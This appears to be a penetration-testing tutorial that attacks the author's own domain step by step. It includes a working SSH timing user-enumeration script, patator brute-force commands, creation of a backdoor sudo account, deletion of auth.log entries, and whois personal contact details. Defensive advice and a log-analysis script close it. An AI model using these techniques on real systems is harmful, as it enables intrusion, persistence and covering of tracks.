- A hacker can get a foothold in a network through different techniques and for different reasons. A network can be chosen deliberately by the attacker for whatever reason he has, in which case it is a target of choice, or it can simply be a target of opportunity that he stumbled on with a random scan.
- "If a network is not a target of choice, that does not mean it is safe; it is just a matter of time until it becomes a target of opportunity."
- Hackers usually go through these well-known steps to gain access to a network:
- 1- Reconnaissance and foot/fingerprinting:- Reconnaissance is the first step of an attack, and this phase is mostly about information gathering: every piece of information the hacker can collect about the victim, even if it looks simple and useless. He can collect it in different ways, for example dumpster diving around the target's office, checking the staff's social network profiles, googling the target and noting whatever comes up, or social engineering. Footprinting then completes the step. Footprinting is the study of the network itself: how the devices are connected, how many devices there are, the infrastructure, firewalls, etc.
- "This phase depends on OSINT (open source intelligence), with no direct contact with the target."
- 2- Scanning:- The attacker now engages with the target for more specific details, for example open ports and running services. Say port 22 is open: with a simple telnet command we can read the banner and learn the SSH version running on the server.
- 3- Enumeration, gaining access and privilege escalation:- Three different processes. First, enumeration, which lets the hacker find the valid accounts he wants to get into, using an active connection. For example, he knows from the previous steps (reconnaissance, footprinting and scanning) that an SSH service is running on the default port 22; by enumerating he can tell whether a given username is valid or not with a simple Python script. The next step is attacking the valid accounts, typically by brute-forcing their passwords. If he manages to get into the SSH server, he will then attempt privilege escalation if the brute-forced account does not have superuser rights.
- 4- Creating a backdoor and covering tracks:- In this phase the hacker has already gained access, and he installs a rootkit or backdoor to guarantee himself a free entrance to the network later on, for example by creating a new user and adding it to the sudo group. The last step is covering his tracks by editing the logs and deleting the entries that record his activity.
- A hacker will not delete the logs outright, as a missing or empty log file gets the network administrator's attention; he removes only his own entries.
- The above section was a short description of how a hacker can get into a network. The following section is a real-life example of breaking into a network.
- A real-life example,
- Let's say a hacker would like to take over ashellz.com (it is owned by me). I will try to demonstrate the process step by step according to the above explanation.
- Reconnaissance and Foot printing:-
- Google the target domain ashellz.com
- Whois the target domain.
- root@Mox:/home/allamoox# whois ashellz.com
- Registrar: GoDaddy.com
- Tech Email: allamoox@hotmail.com
- Name Server: NS8015.HOSTGATOR.COM
- Name Server: NS8016.HOSTGATOR.COM
- Tech Name: mahmoud allam
- Tech Organization: aLLamoox
- Tech Street: aol tarik shobar
- Tech City: Tanta
- Tech State/Province: gHARBIA
- Tech Postal Code: 31111
- Tech Country: EG
- Tech Phone: +20.104691184
- Dig the target domain.
- root@Mox:/home/allamoox# dig ashellz.com any
- (Using dig with the switch "any" to show all record types.)
- ashellz.com. 14385 IN A 192.185.16.67
- ashellz.com. 86385 IN SOA ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
- ashellz.com. 14385 IN MX 0 mail.ashellz.com.
- ashellz.com. 14385 IN TXT "v=spf1 a mx include:websitewelcome.com ~all"
- ashellz.com. 86385 IN NS ns8016.hostgator.com.
- ashellz.com. 86385 IN NS ns8015.hostgator.com
- These steps can be considered a "passive scan": only public sources (search engines, whois, DNS) are queried, and the target's own servers are never contacted.
- Scanning:-
- We will use nmap with the switch -O to detect the OS and -sS (SYN scan) so the connection is dropped before the three-way handshake completes.
- root@Mox:/home/allamoox# nmap -O -sS ashellz.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp filtered ssh
- 25/tcp filtered smtp
- 26/tcp open rsftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 135/tcp filtered msrpc
- 139/tcp filtered netbios-ssn
- 143/tcp open imap
- 443/tcp open https
- 445/tcp filtered microsoft-ds
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%) .
- root@Mox:/home/allamoox# telnet private.ashellz.com 22
- Trying 158.69.197.45...
- Connected to private.ashellz.com.
- Escape character is '^]'.
- SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
- By a simple search about "OpenSSH_6.7p1 Debian-5+deb8u2" the hacker will learn that it is vulnerable to user enumeration (a timing difference when a very long password is sent, which OpenSSH fixed in version 7.3).
- These steps can be considered an active scan: the target's own servers are now being contacted directly.
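- As an added example (not part of the original write-up), the banner grab above done in Python instead of telnet, with the OpenSSH version parsed out of the identification string and checked against the timing-based user enumeration weakness, which OpenSSH closed in version 7.3. The first sample banner is the one observed above; the other two banners and the hostname argument are assumptions made for the example.

```python
import re
import socket

# Identification string, e.g. "SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2"
BANNER_RE = re.compile(
    r"^SSH-(?P<proto>[\d.]+)-OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)(?:p\d+)?"
)

# The long-password timing leak was fixed in OpenSSH 7.3
TIMING_LEAK_FIXED = (7, 3)


def grab_banner(host, port=22, timeout=5.0):
    """Connect and read the identification string the SSH server sends first
    (the same line the telnet step shows)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(256).decode("ascii", "replace").strip()


def parse_openssh_version(banner):
    """Return (major, minor) for an OpenSSH banner, None for any other server."""
    m = BANNER_RE.match(banner.strip())
    if m is None:
        return None
    return int(m.group("major")), int(m.group("minor"))


def timing_enum_susceptible(banner):
    """True when the banner is OpenSSH older than 7.3, i.e. the server still
    leaks whether a user exists through the time it spends on a long password."""
    version = parse_openssh_version(banner)
    return version is not None and version < TIMING_LEAK_FIXED


# Constructed sample banners for offline use: the first is the one observed
# above; the other two are assumed examples of a patched server and a
# non-OpenSSH server.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2",
    "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7",
    "SSH-2.0-dropbear_2019.78",
]

if __name__ == "__main__":
    import sys
    # Pass a host on the command line to read its live banner, otherwise use the samples
    banners = [grab_banner(sys.argv[1])] if len(sys.argv) > 1 else SAMPLE_BANNERS
    for b in banners:
        print(f"{b!r}: version={parse_openssh_version(b)} "
              f"timing-enum={timing_enum_susceptible(b)}")
```

The version check only says whether the timing leak is still present; it does not tell you whether the server even allows password authentication, so the enumeration step below is still worth a dry run against a known-bad username before drawing conclusions.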
- Enumeration:-
- At this point the hacker has a good idea about the target and which parts are vulnerable, and he starts enumerating valid accounts on the SSH service with a timing attack.
- The technique depends on the time the server takes to authenticate a user. The server hashes the supplied password only for accounts that exist, so with a very long password (25,000 characters in the script below) a non-existent user gets a rejection back much faster than an existing user does.
- The hacker can use this simple Python script to enumerate valid users.
- # Timing-based SSH user enumeration: the server only hashes the password for
- # accounts that exist, so a very long password makes valid users answer slower.
- import time
- import paramiko
- 
- HOST = '192.185.16.67'
- # Asking for the username to be checked
- user = input("user: ")
- # Password: the letter A repeated 25000 times
- p = 'A' * 25000
- 
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- starttime = time.perf_counter()
- try:
-     # Open an SSH connection to the server with the chosen user and the 25000-letter password
-     ssh.connect(HOST, username=user, password=p, allow_agent=False, look_for_keys=False)
- except paramiko.SSHException:
-     # Authentication is expected to fail; what matters is how long the rejection took
-     pass
- finally:
-     total = time.perf_counter() - starttime
-     ssh.close()
- # A slow answer (seconds) means the user exists, a fast one means it does not
- print(user, total)
- root@Mox:/home/allamoox# python3 code.py
- Running it for a list of candidate names and comparing the times gives a few valid accounts, such as root, allamoox, allam and test.
- Gaining access
- Using patator (a Python tool for brute-forcing many services such as FTP, SSH, etc.) against this user list with a short list of easy-to-guess passwords.
- allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/user.txt 0=/home/allamoox/easy_guess.txt -x ignore:mesg='Authentication failed.'
- 17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
- 17:45:12 patator INFO -
- 17:45:12 patator INFO - code size time | candidate | num | mesg
- 17:45:12 patator INFO - -----------------------------------------------------------------------------
- 17:51:22 patator INFO - 0 37 0.204 | test123:test | 1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
- 17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 0h 1m 2s
- The hacker got two accounts in just a few minutes because of weak passwords.
- Privilege escalation
- Now that the hacker has a valid account, he checks whether it is in the sudo list by running any command as superuser:
- test@aShellz:/home/allamoox$ sudo uptime
- [sudo] password for test:
- test is not in the sudoers file. This incident will be reported.
- test@aShellz:/home/allamoox$
- It is not a superuser, but it is still a very useful account. The hacker will now list the groups on the server and their members, looking for the sudo group:
- test@aShellz:/home/allamoox$ cat /etc/group
- bin:x:2:
- sys:x:3:
- adm:x:4:
- tty:x:5:
- disk:x:6:
- lp:x:7:
- mail:x:8:
- news:x:9:
- uucp:x:10:
- man:x:12:
- proxy:x:13:
- kmem:x:15:
- dialout:x:20:
- fax:x:21:
- voice:x:22:
- cdrom:x:24:
- floppy:x:25:
- tape:x:26:
- sudo:x:27:allamoox,xenthys,jack3
- audio:x:29:
- dip:x:30:
- www-data:x:33:
- backup:x:34:
- operator:x:37:
- list:x:38:
- irc:x:39:
- src:x:40:
- gnats:x:41:
- shadow:x:42:
- utmp:x:43:
- video:x:44:
- sasl:x:45:
- plugdev:x:46:
- staff:x:50:
- games:x:60:
- users:x:100:
- nogroup:x:65534:
- netdev:x:101:
- input:x:102:
- systemd-journal:x:103:
- systemd-timesync:x:104:
- systemd-network:x:105:
- systemd-resolve:x:106:
- systemd-bus-proxy:x:107:
- ssh:x:108:
- messagebus:x:109:
- Now the hacker will try to break into any of these accounts (sudo:x:27:allamoox,xenthys,jack3) and he will own the server. Again he will brute-force them with patator, this time with a much bigger wordlist and with user.txt holding just those three names.
- allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/user.txt 0=/home/allamoox/20_million_password_list_top_2000000.txt -x ignore:mesg='Authentication failed.'
- 17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
- 17:45:12 patator INFO -
- 17:45:12 patator INFO - code size time | candidate | num | mesg
- 17:45:12 patator INFO - -----------------------------------------------------------------------------
- 17:51:22 patator INFO - 0 37 0.204 | qazxswedc123:jack3 | 1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
- 17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 21h 1m 49s.
- As we can see, "jack3" used a keyboard-pattern password, and it was included in the huge wordlist, so his account got hacked. The hacker will now become root:
- jack3@aShellz:/home/jack3$ sudo su
- [sudo] password for jack3:
- root@aShellz:/home/jack3#
- He will add another account and put it in the superuser list to guarantee himself a free entrance to the server in the future, using an inconspicuous name like "system".
- root@aShellz:/home/allamoox# adduser system
- Adding the user to the sudo group (-a appends to the account's existing supplementary groups instead of replacing them):
- root@aShellz:/home/allamoox# usermod -aG sudo system
- root@aShellz:/home/allamoox# grep sudo /etc/group
- sudo:x:27:jack3,xenthys,allamoox,system
- Then the hacker clears his tracks from the log.
- To know how many lines, words and characters are in the log file:
- root@aShellz:/home# wc /var/log/auth.log
- 200601 2731431 21813737 /var/log/auth.log
- More than 200k lines.
- The hacker will open the file and delete only his own entries from the log, for example lines like the following:
- root@aShellz:/home# nano /var/log/auth.log
- Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 81.229. port 35784 ssh2
- Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
- Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
- For sure there are many lines the hacker needs to delete, so he might use awk or sed to delete every "Failed password" line dated Sep 24, together with the passwd, groupadd and usermod entries for jack3 and system.
- The last thing the hacker does is clear his commands from the shell history as well.
- P.S: The hacker can use completely different scenarios depending on the situation.
- A solution could be a good, enforced security policy, a program like Fail2ban to block brute-force attempts, and a decent, properly configured firewall. In this scenario, key-only SSH authentication (no password logins), no root login over SSH and a patched OpenSSH would each have stopped a step of the attack.
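- As an added example (not from the original write-up), the defender's side of the last two sections: a small Python check over /var/log/auth.log that flags a burst of "Failed password" lines from one source, which is exactly what Fail2ban counts before it blocks, and that flags accounts added to the sudo group, which is the trace the backdoor step leaves behind. The log lines below are constructed for the example (RFC 5737 addresses), modelled on the entries quoted above; the usermod wording is assumed to follow what shadow-utils writes on Debian.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd failure line, e.g.
# "Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 198.51.100.7 port 35784 ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)
# usermod/gpasswd line written when an account is added to the sudo group
# (assumed shadow-utils wording: "add 'system' to group 'sudo'")
SUDO_ADD_RE = re.compile(
    r"(?:usermod|gpasswd)\[\d+\]: add '(?P<user>[^']+)' to group 'sudo'"
)


def parse_syslog_time(stamp):
    # syslog stamps carry no year; deltas within one log are all we need here
    return datetime.strptime(stamp, "%b %d %H:%M:%S")


def brute_force_sources(lines, threshold=5, window_seconds=600):
    """Map source IP -> total failed SSH logins, for every IP that produced at
    least `threshold` failures inside any `window_seconds` span (the same
    maxretry/findtime logic Fail2ban applies before banning)."""
    failures = defaultdict(list)
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            failures[m.group("ip")].append(parse_syslog_time(m.group("ts")))
    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        for i in range(len(stamps) - threshold + 1):
            if (stamps[i + threshold - 1] - stamps[i]).total_seconds() <= window_seconds:
                flagged[ip] = len(stamps)
                break
    return flagged


def sudo_additions(lines):
    """Sorted list of accounts that were added to the sudo group."""
    users = {m.group("user") for m in map(SUDO_ADD_RE.search, lines) if m}
    return sorted(users)


# Constructed sample log (not a real capture); mirrors the entries quoted above
SAMPLE_LOG = """\
Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 198.51.100.7 port 35784 ssh2
Sep 24 21:27:33 vps1670 sshd[1719]: Failed password for root from 198.51.100.7 port 35786 ssh2
Sep 24 21:27:35 vps1670 sshd[1723]: Failed password for invalid user admin from 198.51.100.7 port 35790 ssh2
Sep 24 21:27:36 vps1670 sshd[1725]: Failed password for test from 198.51.100.7 port 35794 ssh2
Sep 24 21:27:38 vps1670 sshd[1727]: Failed password for allamoox from 198.51.100.7 port 35798 ssh2
Sep 24 21:27:40 vps1670 sshd[1729]: Accepted password for test from 198.51.100.7 port 35802 ssh2
Sep 24 21:45:10 vps1670 sshd[1800]: Failed password for jack3 from 203.0.113.9 port 40000 ssh2
Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
Sep 24 21:50:41 vps1670 usermod[1952]: add 'system' to group 'sudo'
Sep 24 21:50:41 vps1670 usermod[1952]: add 'system' to shadow group 'sudo'
Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()

if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_LINES))
    print("added to sudo:", sudo_additions(SAMPLE_LINES))
```

Because the attacker's last step is to delete exactly these lines from the local file, the checks are only worth something when they run against a copy of the log that the compromised host cannot edit, i.e. auth.log shipped to a remote syslog collector as it is written.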